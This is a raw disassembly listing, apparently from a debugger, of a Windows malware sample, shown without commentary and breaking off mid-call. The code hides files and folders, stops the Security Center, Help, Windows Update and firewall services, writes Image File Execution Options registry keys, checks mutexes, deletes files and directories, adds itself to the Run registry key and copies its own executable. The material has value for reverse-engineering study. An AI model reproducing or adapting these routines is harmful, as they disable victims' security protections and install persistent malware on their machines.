0040F45B |. 6A 00 |push 0 ; /lParam = 0
0040F45D |. 6A 00 |push 0 ; |wParam = 0
0040F45F |. 6A 10 |push 10 ; |Message = WM_CLOSE
0040F461 |. 68 60034100 |push 00410360 ; |/Title = "My Computer"
0040F466 |. 6A 00 |push 0 ; ||Class = 0
0040F468 |. E8 5753FFFF |call <jmp.&user32.FindWindowA> ; |\FindWindowA
0040F46D |. 50 |push eax ; |hWnd
0040F46E |. E8 9953FFFF |call <jmp.&user32.PostMessageA> ; \PostMessageA
0040F473 |. 6A 06 |push 6
0040F475 |. A1 58154100 |mov eax, dword ptr ds:[411558]
0040F47A |. FF30 |push dword ptr ds:[eax]
0040F47C |. A1 50154100 |mov eax, dword ptr ds:[411550]
0040F481 |. FF30 |push dword ptr ds:[eax]
0040F483 |. FF37 |push dword ptr ds:[edi]
0040F485 |. 8D45 D8 |lea eax, dword ptr ss:[ebp-28]
0040F488 |. BA 03000000 |mov edx, 3
0040F48D |. E8 C648FFFF |call 00403D58
0040F492 |. 8B45 D8 |mov eax, dword ptr ss:[ebp-28]
0040F495 |. E8 FE49FFFF |call 00403E98
0040F49A |. 50 |push eax ; |FileName
0040F49B |. E8 EC52FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F4A0 |. 6A 06 |push 6
0040F4A2 |. 8B0D A4144100 |mov ecx, dword ptr ds:[4114A4] ; 1.004113E0
0040F4A8 |. 8B09 |mov ecx, dword ptr ds:[ecx]
0040F4AA |. 8B15 58154100 |mov edx, dword ptr ds:[411558] ; 1.004130F8
0040F4B0 |. 8B12 |mov edx, dword ptr ds:[edx]
0040F4B2 |. 8D45 D4 |lea eax, dword ptr ss:[ebp-2C]
0040F4B5 |. E8 2A48FFFF |call 00403CE4
0040F4BA |. 8B45 D4 |mov eax, dword ptr ss:[ebp-2C]
0040F4BD |. E8 D649FFFF |call 00403E98
0040F4C2 |. 50 |push eax ; |FileName
0040F4C3 |. E8 C452FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F4C8 |. 6A 06 |push 6
0040F4CA |. 8D45 D0 |lea eax, dword ptr ss:[ebp-30]
0040F4CD |. E8 B284FFFF |call 00407984
0040F4D2 |. 8D45 D0 |lea eax, dword ptr ss:[ebp-30]
0040F4D5 |. 8B15 B4144100 |mov edx, dword ptr ds:[4114B4] ; 1.004113D4
0040F4DB |. 8B12 |mov edx, dword ptr ds:[edx]
0040F4DD |. E8 BE47FFFF |call 00403CA0
0040F4E2 |. 8B45 D0 |mov eax, dword ptr ss:[ebp-30]
0040F4E5 |. E8 AE49FFFF |call 00403E98
0040F4EA |. 50 |push eax ; |FileName
0040F4EB |. E8 9C52FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F4F0 |. 6A 06 |push 6
0040F4F2 |. 8D45 C8 |lea eax, dword ptr ss:[ebp-38]
0040F4F5 |. E8 2685FFFF |call 00407A20
0040F4FA |. FF75 C8 |push dword ptr ss:[ebp-38]
0040F4FD |. A1 5C144100 |mov eax, dword ptr ds:[41145C]
0040F502 |. FF30 |push dword ptr ds:[eax]
0040F504 |. FF37 |push dword ptr ds:[edi]
0040F506 |. 8D45 CC |lea eax, dword ptr ss:[ebp-34]
0040F509 |. BA 03000000 |mov edx, 3
0040F50E |. E8 4548FFFF |call 00403D58
0040F513 |. 8B45 CC |mov eax, dword ptr ss:[ebp-34]
0040F516 |. E8 7D49FFFF |call 00403E98
0040F51B |. 50 |push eax ; |FileName
0040F51C |. E8 6B52FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F521 |. 6A 06 |push 6
0040F523 |. 8D45 C0 |lea eax, dword ptr ss:[ebp-40]
0040F526 |. E8 A585FFFF |call 00407AD0
0040F52B |. FF75 C0 |push dword ptr ss:[ebp-40]
0040F52E |. A1 3C154100 |mov eax, dword ptr ds:[41153C]
0040F533 |. FF30 |push dword ptr ds:[eax]
0040F535 |. FF37 |push dword ptr ds:[edi]
0040F537 |. 8D45 C4 |lea eax, dword ptr ss:[ebp-3C]
0040F53A |. BA 03000000 |mov edx, 3
0040F53F |. E8 1448FFFF |call 00403D58
0040F544 |. 8B45 C4 |mov eax, dword ptr ss:[ebp-3C]
0040F547 |. E8 4C49FFFF |call 00403E98
0040F54C |. 50 |push eax ; |FileName
0040F54D |. E8 3A52FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F552 |. 6A 06 |push 6
0040F554 |. 8D45 BC |lea eax, dword ptr ss:[ebp-44]
0040F557 |. E8 2884FFFF |call 00407984
0040F55C |. 8D45 BC |lea eax, dword ptr ss:[ebp-44]
0040F55F |. BA 74034100 |mov edx, 00410374 ; ASCII "Common Files\System"
0040F564 |. E8 3747FFFF |call 00403CA0
0040F569 |. 8B45 BC |mov eax, dword ptr ss:[ebp-44]
0040F56C |. E8 2749FFFF |call 00403E98
0040F571 |. 50 |push eax ; |FileName
0040F572 |. E8 1552FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F577 |. 6A 06 |push 6
0040F579 |. 8D45 B8 |lea eax, dword ptr ss:[ebp-48]
0040F57C |. E8 0384FFFF |call 00407984
0040F581 |. 8D45 B8 |lea eax, dword ptr ss:[ebp-48]
0040F584 |. BA 90034100 |mov edx, 00410390 ; ASCII "Common Files\Microsoft Shared"
0040F589 |. E8 1247FFFF |call 00403CA0
0040F58E |. 8B45 B8 |mov eax, dword ptr ss:[ebp-48]
0040F591 |. E8 0249FFFF |call 00403E98
0040F596 |. 50 |push eax ; |FileName
0040F597 |. E8 F051FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F59C |> 83C3 04 |add ebx, 4
0040F59F |. 4E |dec esi
0040F5A0 |.^ 0F85 FBFDFFFF \jnz 0040F3A1
0040F5A6 |. B8 B8034100 mov eax, 004103B8 ; ASCII "wscsvc"
0040F5AB |. E8 2087FFFF call 00407CD0
0040F5B0 |. B8 C8034100 mov eax, 004103C8 ; ASCII "helpsvc"
0040F5B5 |. E8 1687FFFF call 00407CD0
0040F5BA |. B8 D8034100 mov eax, 004103D8 ; ASCII "wuauserv"
0040F5BF |. E8 0C87FFFF call 00407CD0
0040F5C4 |. B8 EC034100 mov eax, 004103EC ; ASCII "SharedAccess"
0040F5C9 |. E8 0287FFFF call 00407CD0
0040F5CE |. 68 04044100 push 00410404 ; ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\"
0040F5D3 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F5D8 |. FF30 push dword ptr ds:[eax]
0040F5DA |. FF37 push dword ptr ds:[edi]
0040F5DC |. 8D45 B4 lea eax, dword ptr ss:[ebp-4C]
0040F5DF |. BA 03000000 mov edx, 3
0040F5E4 |. E8 6F47FFFF call 00403D58
0040F5E9 |. 8B55 B4 mov edx, dword ptr ss:[ebp-4C]
0040F5EC |. B8 02000080 mov eax, 80000002
0040F5F1 |. E8 3E76FFFF call 00406C34
0040F5F6 |. 68 04044100 push 00410404 ; ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\"
0040F5FB |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040F600 |. FF30 push dword ptr ds:[eax]
0040F602 |. FF37 push dword ptr ds:[edi]
0040F604 |. 8D45 B0 lea eax, dword ptr ss:[ebp-50]
0040F607 |. BA 03000000 mov edx, 3
0040F60C |. E8 4747FFFF call 00403D58
0040F611 |. 8B55 B0 mov edx, dword ptr ss:[ebp-50]
0040F614 |. B8 02000080 mov eax, 80000002
0040F619 |. E8 1676FFFF call 00406C34
0040F61E |. 8D55 AC lea edx, dword ptr ss:[ebp-54]
0040F621 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F626 |. 8B00 mov eax, dword ptr ds:[eax]
0040F628 |. E8 D36DFFFF call 00406400
0040F62D |. 8B45 AC mov eax, dword ptr ss:[ebp-54]
0040F630 |. 50 push eax
0040F631 |. 8D45 A0 lea eax, dword ptr ss:[ebp-60]
0040F634 |. E8 E783FFFF call 00407A20
0040F639 |. FF75 A0 push dword ptr ss:[ebp-60]
0040F63C |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F641 |. FF30 push dword ptr ds:[eax]
0040F643 |. FF37 push dword ptr ds:[edi]
0040F645 |. 8D45 A4 lea eax, dword ptr ss:[ebp-5C]
0040F648 |. BA 03000000 mov edx, 3
0040F64D |. E8 0647FFFF call 00403D58
0040F652 |. 8B45 A4 mov eax, dword ptr ss:[ebp-5C]
0040F655 |. 8D55 A8 lea edx, dword ptr ss:[ebp-58]
0040F658 |. E8 A36DFFFF call 00406400
0040F65D |. 8B55 A8 mov edx, dword ptr ss:[ebp-58]
0040F660 |. 58 pop eax
0040F661 |. E8 7E47FFFF call 00403DE4
0040F666 |. 0F84 C4060000 je 0040FD30
0040F66C |. 8D55 9C lea edx, dword ptr ss:[ebp-64]
0040F66F |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F674 |. 8B00 mov eax, dword ptr ds:[eax]
0040F676 |. E8 856DFFFF call 00406400
0040F67B |. 8B45 9C mov eax, dword ptr ss:[ebp-64]
0040F67E |. 50 push eax
0040F67F |. 8D45 90 lea eax, dword ptr ss:[ebp-70]
0040F682 |. E8 4984FFFF call 00407AD0
0040F687 |. FF75 90 push dword ptr ss:[ebp-70]
0040F68A |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040F68F |. FF30 push dword ptr ds:[eax]
0040F691 |. FF37 push dword ptr ds:[edi]
0040F693 |. 8D45 94 lea eax, dword ptr ss:[ebp-6C]
0040F696 |. BA 03000000 mov edx, 3
0040F69B |. E8 B846FFFF call 00403D58
0040F6A0 |. 8B45 94 mov eax, dword ptr ss:[ebp-6C]
0040F6A3 |. 8D55 98 lea edx, dword ptr ss:[ebp-68]
0040F6A6 |. E8 556DFFFF call 00406400
0040F6AB |. 8B55 98 mov edx, dword ptr ss:[ebp-68]
0040F6AE |. 58 pop eax
0040F6AF |. E8 3047FFFF call 00403DE4
0040F6B4 |. 0F84 76060000 je 0040FD30
0040F6BA |. 8D55 8C lea edx, dword ptr ss:[ebp-74]
0040F6BD |. A1 60144100 mov eax, dword ptr ds:[411460]
0040F6C2 |. 8B00 mov eax, dword ptr ds:[eax]
0040F6C4 |. E8 D36FFFFF call 0040669C
0040F6C9 |. 8D45 8C lea eax, dword ptr ss:[ebp-74]
0040F6CC |. 50 push eax
0040F6CD |. 8D45 84 lea eax, dword ptr ss:[ebp-7C]
0040F6D0 |. E8 F369FFFF call 004060C8
0040F6D5 |. 8B45 84 mov eax, dword ptr ss:[ebp-7C]
0040F6D8 |. 8D55 88 lea edx, dword ptr ss:[ebp-78]
0040F6DB |. E8 AC84FFFF call 00407B8C
0040F6E0 |. 8B55 88 mov edx, dword ptr ss:[ebp-78]
0040F6E3 |. 58 pop eax
0040F6E4 |. E8 B745FFFF call 00403CA0
0040F6E9 |. 8B45 8C mov eax, dword ptr ss:[ebp-74]
0040F6EC |. E8 A747FFFF call 00403E98
0040F6F1 |. 50 push eax ; /MutexName
0040F6F2 |. 6A 00 push 0 ; |Inheritable = FALSE
0040F6F4 |. 68 01001F00 push 1F0001 ; |Access = 1F0001
0040F6F9 |. E8 6650FFFF call <jmp.&kernel32.OpenMutexA> ; \OpenMutexA
0040F6FE |. 85C0 test eax, eax
0040F700 |. 0F85 EA0B0000 jnz 004102F0
0040F706 |. 8D85 7CFFFFFF lea eax, dword ptr ss:[ebp-84]
0040F70C |. E8 B769FFFF call 004060C8
0040F711 |. 8B85 7CFFFFFF mov eax, dword ptr ss:[ebp-84]
0040F717 |. 8D55 80 lea edx, dword ptr ss:[ebp-80]
0040F71A |. E8 6D84FFFF call 00407B8C
0040F71F |. 8D45 80 lea eax, dword ptr ss:[ebp-80]
0040F722 |. 50 push eax
0040F723 |. 8D95 78FFFFFF lea edx, dword ptr ss:[ebp-88]
0040F729 |. A1 64144100 mov eax, dword ptr ds:[411464]
0040F72E |. 8B00 mov eax, dword ptr ds:[eax]
0040F730 |. E8 676FFFFF call 0040669C
0040F735 |. 8B95 78FFFFFF mov edx, dword ptr ss:[ebp-88]
0040F73B |. 58 pop eax
0040F73C |. E8 5F45FFFF call 00403CA0
0040F741 |. 8B45 80 mov eax, dword ptr ss:[ebp-80]
0040F744 |. E8 4F47FFFF call 00403E98
0040F749 |. 50 push eax ; /MutexName
0040F74A |. 6A 00 push 0 ; |Inheritable = FALSE
0040F74C |. 68 01001F00 push 1F0001 ; |Access = 1F0001
0040F751 |. E8 0E50FFFF call <jmp.&kernel32.OpenMutexA> ; \OpenMutexA
0040F756 |. 85C0 test eax, eax
0040F758 |. 0F85 920B0000 jnz 004102F0
0040F75E |. E8 0530FFFF call 00402768
0040F763 |. B8 19000000 mov eax, 19
0040F768 |. E8 9F35FFFF call 00402D0C
0040F76D |. 8BD0 mov edx, eax
0040F76F |. 83C2 61 add edx, 61
0040F772 |. 8D85 74FFFFFF lea eax, dword ptr ss:[ebp-8C]
0040F778 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F77B |. C600 01 mov byte ptr ds:[eax], 1
0040F77E |. 8D95 74FFFFFF lea edx, dword ptr ss:[ebp-8C]
0040F784 |. 8D85 70FFFFFF lea eax, dword ptr ss:[ebp-90]
0040F78A |. E8 CD34FFFF call 00402C5C
0040F78F |. B8 19000000 mov eax, 19
0040F794 |. E8 7335FFFF call 00402D0C
0040F799 |. 8BD0 mov edx, eax
0040F79B |. 83C2 61 add edx, 61
0040F79E |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F7A4 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F7A7 |. C600 01 mov byte ptr ds:[eax], 1
0040F7AA |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F7B0 |. 8D85 70FFFFFF lea eax, dword ptr ss:[ebp-90]
0040F7B6 |. B1 02 mov cl, 2
0040F7B8 |. E8 6F34FFFF call 00402C2C
0040F7BD |. 8D95 70FFFFFF lea edx, dword ptr ss:[ebp-90]
0040F7C3 |. 8D85 68FFFFFF lea eax, dword ptr ss:[ebp-98]
0040F7C9 |. E8 8E34FFFF call 00402C5C
0040F7CE |. B8 19000000 mov eax, 19
0040F7D3 |. E8 3435FFFF call 00402D0C
0040F7D8 |. 8BD0 mov edx, eax
0040F7DA |. 83C2 61 add edx, 61
0040F7DD |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F7E3 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F7E6 |. C600 01 mov byte ptr ds:[eax], 1
0040F7E9 |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F7EF |. 8D85 68FFFFFF lea eax, dword ptr ss:[ebp-98]
0040F7F5 |. B1 03 mov cl, 3
0040F7F7 |. E8 3034FFFF call 00402C2C
0040F7FC |. 8D95 68FFFFFF lea edx, dword ptr ss:[ebp-98]
0040F802 |. 8D85 60FFFFFF lea eax, dword ptr ss:[ebp-A0]
0040F808 |. E8 4F34FFFF call 00402C5C
0040F80D |. B8 19000000 mov eax, 19
0040F812 |. E8 F534FFFF call 00402D0C
0040F817 |. 8BD0 mov edx, eax
0040F819 |. 83C2 61 add edx, 61
0040F81C |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F822 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F825 |. C600 01 mov byte ptr ds:[eax], 1
0040F828 |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F82E |. 8D85 60FFFFFF lea eax, dword ptr ss:[ebp-A0]
0040F834 |. B1 04 mov cl, 4
0040F836 |. E8 F133FFFF call 00402C2C
0040F83B |. 8D95 60FFFFFF lea edx, dword ptr ss:[ebp-A0]
0040F841 |. 8D85 58FFFFFF lea eax, dword ptr ss:[ebp-A8]
0040F847 |. E8 1034FFFF call 00402C5C
0040F84C |. B8 19000000 mov eax, 19
0040F851 |. E8 B634FFFF call 00402D0C
0040F856 |. 8BD0 mov edx, eax
0040F858 |. 83C2 61 add edx, 61
0040F85B |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F861 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F864 |. C600 01 mov byte ptr ds:[eax], 1
0040F867 |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F86D |. 8D85 58FFFFFF lea eax, dword ptr ss:[ebp-A8]
0040F873 |. B1 05 mov cl, 5
0040F875 |. E8 B233FFFF call 00402C2C
0040F87A |. 8D95 58FFFFFF lea edx, dword ptr ss:[ebp-A8]
0040F880 |. 8D85 50FFFFFF lea eax, dword ptr ss:[ebp-B0]
0040F886 |. E8 D133FFFF call 00402C5C
0040F88B |. B8 19000000 mov eax, 19
0040F890 |. E8 7734FFFF call 00402D0C
0040F895 |. 8BD0 mov edx, eax
0040F897 |. 83C2 61 add edx, 61
0040F89A |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F8A0 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F8A3 |. C600 01 mov byte ptr ds:[eax], 1
0040F8A6 |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F8AC |. 8D85 50FFFFFF lea eax, dword ptr ss:[ebp-B0]
0040F8B2 |. B1 06 mov cl, 6
0040F8B4 |. E8 7333FFFF call 00402C2C
0040F8B9 |. 8D95 50FFFFFF lea edx, dword ptr ss:[ebp-B0]
0040F8BF |. B8 0C314100 mov eax, 0041310C
0040F8C4 |. E8 AB43FFFF call 00403C74
0040F8C9 |. 68 80000000 push 80
0040F8CE |. 8D85 48FFFFFF lea eax, dword ptr ss:[ebp-B8]
0040F8D4 |. E8 4781FFFF call 00407A20
0040F8D9 |. FFB5 48FFFFFF push dword ptr ss:[ebp-B8]
0040F8DF |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F8E4 |. FF30 push dword ptr ds:[eax]
0040F8E6 |. FF37 push dword ptr ds:[edi]
0040F8E8 |. 8D85 4CFFFFFF lea eax, dword ptr ss:[ebp-B4]
0040F8EE |. BA 03000000 mov edx, 3
0040F8F3 |. E8 6044FFFF call 00403D58
0040F8F8 |. 8B85 4CFFFFFF mov eax, dword ptr ss:[ebp-B4]
0040F8FE |. E8 9545FFFF call 00403E98
0040F903 |. 50 push eax ; |FileName
0040F904 |. E8 834EFFFF call <jmp.&kernel32.SetFileAttributes>; \SetFileAttributesA
0040F909 |. 68 80000000 push 80
0040F90E |. 8D85 40FFFFFF lea eax, dword ptr ss:[ebp-C0]
0040F914 |. E8 B781FFFF call 00407AD0
0040F919 |. FFB5 40FFFFFF push dword ptr ss:[ebp-C0]
0040F91F |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040F924 |. FF30 push dword ptr ds:[eax]
0040F926 |. FF37 push dword ptr ds:[edi]
0040F928 |. 8D85 44FFFFFF lea eax, dword ptr ss:[ebp-BC]
0040F92E |. BA 03000000 mov edx, 3
0040F933 |. E8 2044FFFF call 00403D58
0040F938 |. 8B85 44FFFFFF mov eax, dword ptr ss:[ebp-BC]
0040F93E |. E8 5545FFFF call 00403E98
0040F943 |. 50 push eax ; |FileName
0040F944 |. E8 434EFFFF call <jmp.&kernel32.SetFileAttributes>; \SetFileAttributesA
0040F949 |. 8D85 38FFFFFF lea eax, dword ptr ss:[ebp-C8]
0040F94F |. E8 CC80FFFF call 00407A20
0040F954 |. FFB5 38FFFFFF push dword ptr ss:[ebp-C8]
0040F95A |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F95F |. FF30 push dword ptr ds:[eax]
0040F961 |. FF37 push dword ptr ds:[edi]
0040F963 |. 8D85 3CFFFFFF lea eax, dword ptr ss:[ebp-C4]
0040F969 |. BA 03000000 mov edx, 3
0040F96E |. E8 E543FFFF call 00403D58
0040F973 |. 8B85 3CFFFFFF mov eax, dword ptr ss:[ebp-C4]
0040F979 |. E8 1A45FFFF call 00403E98
0040F97E |. 50 push eax ; /FileName
0040F97F |. E8 404DFFFF call <jmp.&kernel32.DeleteFileA> ; \DeleteFileA
0040F984 |. 8D85 30FFFFFF lea eax, dword ptr ss:[ebp-D0]
0040F98A |. E8 4181FFFF call 00407AD0
0040F98F |. FFB5 30FFFFFF push dword ptr ss:[ebp-D0]
0040F995 |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040F99A |. FF30 push dword ptr ds:[eax]
0040F99C |. FF37 push dword ptr ds:[edi]
0040F99E |. 8D85 34FFFFFF lea eax, dword ptr ss:[ebp-CC]
0040F9A4 |. BA 03000000 mov edx, 3
0040F9A9 |. E8 AA43FFFF call 00403D58
0040F9AE |. 8B85 34FFFFFF mov eax, dword ptr ss:[ebp-CC]
0040F9B4 |. E8 DF44FFFF call 00403E98
0040F9B9 |. 50 push eax ; /FileName
0040F9BA |. E8 054DFFFF call <jmp.&kernel32.DeleteFileA> ; \DeleteFileA
0040F9BF |. 8D85 28FFFFFF lea eax, dword ptr ss:[ebp-D8]
0040F9C5 |. E8 5680FFFF call 00407A20
0040F9CA |. FFB5 28FFFFFF push dword ptr ss:[ebp-D8]
0040F9D0 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F9D5 |. FF30 push dword ptr ds:[eax]
0040F9D7 |. FF37 push dword ptr ds:[edi]
0040F9D9 |. 8D85 2CFFFFFF lea eax, dword ptr ss:[ebp-D4]
0040F9DF |. BA 03000000 mov edx, 3
0040F9E4 |. E8 6F43FFFF call 00403D58
0040F9E9 |. 8B85 2CFFFFFF mov eax, dword ptr ss:[ebp-D4]
0040F9EF |. E8 A444FFFF call 00403E98
0040F9F4 |. 50 push eax ; /Path
0040F9F5 |. E8 824DFFFF call <jmp.&kernel32.RemoveDirectoryA> ; \RemoveDirectoryA
0040F9FA |. 8D85 20FFFFFF lea eax, dword ptr ss:[ebp-E0]
0040FA00 |. E8 CB80FFFF call 00407AD0
0040FA05 |. FFB5 20FFFFFF push dword ptr ss:[ebp-E0]
0040FA0B |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040FA10 |. FF30 push dword ptr ds:[eax]
0040FA12 |. FF37 push dword ptr ds:[edi]
0040FA14 |. 8D85 24FFFFFF lea eax, dword ptr ss:[ebp-DC]
0040FA1A |. BA 03000000 mov edx, 3
0040FA1F |. E8 3443FFFF call 00403D58
0040FA24 |. 8B85 24FFFFFF mov eax, dword ptr ss:[ebp-DC]
0040FA2A |. E8 6944FFFF call 00403E98
0040FA2F |. 50 push eax ; /Path
0040FA30 |. E8 474DFFFF call <jmp.&kernel32.RemoveDirectoryA> ; \RemoveDirectoryA
0040FA35 |. 8D85 18FFFFFF lea eax, dword ptr ss:[ebp-E8]
0040FA3B |. E8 E07FFFFF call 00407A20
0040FA40 |. 8D85 18FFFFFF lea eax, dword ptr ss:[ebp-E8]
0040FA46 |. 8B15 0C314100 mov edx, dword ptr ds:[41310C]
0040FA4C |. E8 4F42FFFF call 00403CA0
0040FA51 |. 8B85 18FFFFFF mov eax, dword ptr ss:[ebp-E8]
0040FA57 |. E8 3C44FFFF call 00403E98
0040FA5C |. 8BD0 mov edx, eax
0040FA5E |. 8D85 1CFFFFFF lea eax, dword ptr ss:[ebp-E4]
0040FA64 |. E8 DB41FFFF call 00403C44
0040FA69 |. 8B85 1CFFFFFF mov eax, dword ptr ss:[ebp-E4]
0040FA6F |. 50 push eax
0040FA70 |. 8D85 0CFFFFFF lea eax, dword ptr ss:[ebp-F4]
0040FA76 |. E8 A57FFFFF call 00407A20
0040FA7B |. FFB5 0CFFFFFF push dword ptr ss:[ebp-F4]
0040FA81 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040FA86 |. FF30 push dword ptr ds:[eax]
0040FA88 |. FF37 push dword ptr ds:[edi]
0040FA8A |. 8D85 10FFFFFF lea eax, dword ptr ss:[ebp-F0]
0040FA90 |. BA 03000000 mov edx, 3
0040FA95 |. E8 BE42FFFF call 00403D58
0040FA9A |. 8B85 10FFFFFF mov eax, dword ptr ss:[ebp-F0]
0040FAA0 |. E8 F343FFFF call 00403E98
0040FAA5 |. 8BD0 mov edx, eax
0040FAA7 |. 8D85 14FFFFFF lea eax, dword ptr ss:[ebp-EC]
0040FAAD |. E8 9241FFFF call 00403C44
0040FAB2 |. 8B85 14FFFFFF mov eax, dword ptr ss:[ebp-EC]
0040FAB8 |. 5A pop edx
0040FAB9 |. E8 A666FFFF call 00406164
0040FABE |. 8D85 04FFFFFF lea eax, dword ptr ss:[ebp-FC]
0040FAC4 |. E8 0780FFFF call 00407AD0
0040FAC9 |. 8D85 04FFFFFF lea eax, dword ptr ss:[ebp-FC]
0040FACF |. 8B15 0C314100 mov edx, dword ptr ds:[41310C]
0040FAD5 |. E8 C641FFFF call 00403CA0
0040FADA |. 8B85 04FFFFFF mov eax, dword ptr ss:[ebp-FC]
0040FAE0 |. E8 B343FFFF call 00403E98
0040FAE5 |. 8BD0 mov edx, eax
0040FAE7 |. 8D85 08FFFFFF lea eax, dword ptr ss:[ebp-F8]
0040FAED |. E8 5241FFFF call 00403C44
0040FAF2 |. 8B85 08FFFFFF mov eax, dword ptr ss:[ebp-F8]
0040FAF8 |. 50 push eax
0040FAF9 |. 8D85 F8FEFFFF lea eax, dword ptr ss:[ebp-108]
0040FAFF |. E8 CC7FFFFF call 00407AD0
0040FB04 |. FFB5 F8FEFFFF push dword ptr ss:[ebp-108]
0040FB0A |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040FB0F |. FF30 push dword ptr ds:[eax]
0040FB11 |. FF37 push dword ptr ds:[edi]
0040FB13 |. 8D85 FCFEFFFF lea eax, dword ptr ss:[ebp-104]
0040FB19 |. BA 03000000 mov edx, 3
0040FB1E |. E8 3542FFFF call 00403D58
0040FB23 |. 8B85 FCFEFFFF mov eax, dword ptr ss:[ebp-104]
0040FB29 |. E8 6A43FFFF call 00403E98
0040FB2E |. 8BD0 mov edx, eax
0040FB30 |. 8D85 00FFFFFF lea eax, dword ptr ss:[ebp-100]
0040FB36 |. E8 0941FFFF call 00403C44
0040FB3B |. 8B85 00FFFFFF mov eax, dword ptr ss:[ebp-100]
0040FB41 |. 5A pop edx
0040FB42 |. E8 1D66FFFF call 00406164
0040FB47 |. A1 B0144100 mov eax, dword ptr ds:[4114B0]
0040FB4C |. 8B00 mov eax, dword ptr ds:[eax]
0040FB4E |. E8 4543FFFF call 00403E98
0040FB53 |. 8BD0 mov edx, eax
0040FB55 |. 8D85 F4FEFFFF lea eax, dword ptr ss:[ebp-10C]
0040FB5B |. E8 E440FFFF call 00403C44
0040FB60 |. 8B8D F4FEFFFF mov ecx, dword ptr ss:[ebp-10C]
0040FB66 |. BA 58044100 mov edx, 00410458 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0040FB6B |. B8 02000080 mov eax, 80000002
0040FB70 |. E8 CF6FFFFF call 00406B44
0040FB75 |. A1 50154100 mov eax, dword ptr ds:[411550]
0040FB7A |. 8B00 mov eax, dword ptr ds:[eax]
0040FB7C |. E8 1743FFFF call 00403E98
0040FB81 |. 8BD0 mov edx, eax
0040FB83 |. 8D85 F0FEFFFF lea eax, dword ptr ss:[ebp-110]
0040FB89 |. E8 B640FFFF call 00403C44
0040FB8E |. 8B8D F0FEFFFF mov ecx, dword ptr ss:[ebp-110]
0040FB94 |. BA 58044100 mov edx, 00410458 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0040FB99 |. B8 02000080 mov eax, 80000002
0040FB9E |. E8 A16FFFFF call 00406B44
0040FBA3 |. 6A FF push -1
0040FBA5 |. 8D85 E8FEFFFF lea eax, dword ptr ss:[ebp-118]
0040FBAB |. E8 707EFFFF call 00407A20
0040FBB0 |. FFB5 E8FEFFFF push dword ptr ss:[ebp-118]
0040FBB6 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040FBBB |. FF30 push dword ptr ds:[eax]
0040FBBD |. FF37 push dword ptr ds:[edi]
0040FBBF |. 8D85 ECFEFFFF lea eax, dword ptr ss:[ebp-114]
0040FBC5 |. BA 03000000 mov edx, 3
0040FBCA |. E8 8941FFFF call 00403D58
0040FBCF |. 8B85 ECFEFFFF mov eax, dword ptr ss:[ebp-114]
0040FBD5 |. E8 BE42FFFF call 00403E98
0040FBDA |. 50 push eax
0040FBDB |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FBE0 |. 8B00 mov eax, dword ptr ds:[eax]
0040FBE2 |. E8 B142FFFF call 00403E98
0040FBE7 |. 50 push eax ; |ExistingFileName
0040FBE8 |. E8 974AFFFF call <jmp.&kernel32.CopyFileA> ; \CopyFileA
0040FBED |. 6A FF push -1
0040FBEF |. 8D85 E0FEFFFF lea eax, dword ptr ss:[ebp-120]
0040FBF5 |. E8 D67EFFFF call 00407AD0
0040FBFA |. FFB5 E0FEFFFF push dword ptr ss:[ebp-120]
0040FC00 |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040FC05 |. FF30 push dword ptr ds:[eax]
0040FC07 |. FF37 push dword ptr ds:[edi]
0040FC09 |. 8D85 E4FEFFFF lea eax, dword ptr ss:[ebp-11C]
0040FC0F |. BA 03000000 mov edx, 3
0040FC14 |. E8 3F41FFFF call 00403D58
0040FC19 |. 8B85 E4FEFFFF mov eax, dword ptr ss:[ebp-11C]
0040FC1F |. E8 7442FFFF call 00403E98
0040FC24 |. 50 push eax
0040FC25 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FC2A |. 8B00 mov eax, dword ptr ds:[eax]
0040FC2C |. E8 6742FFFF call 00403E98
0040FC31 |. 50 push eax ; |ExistingFileName
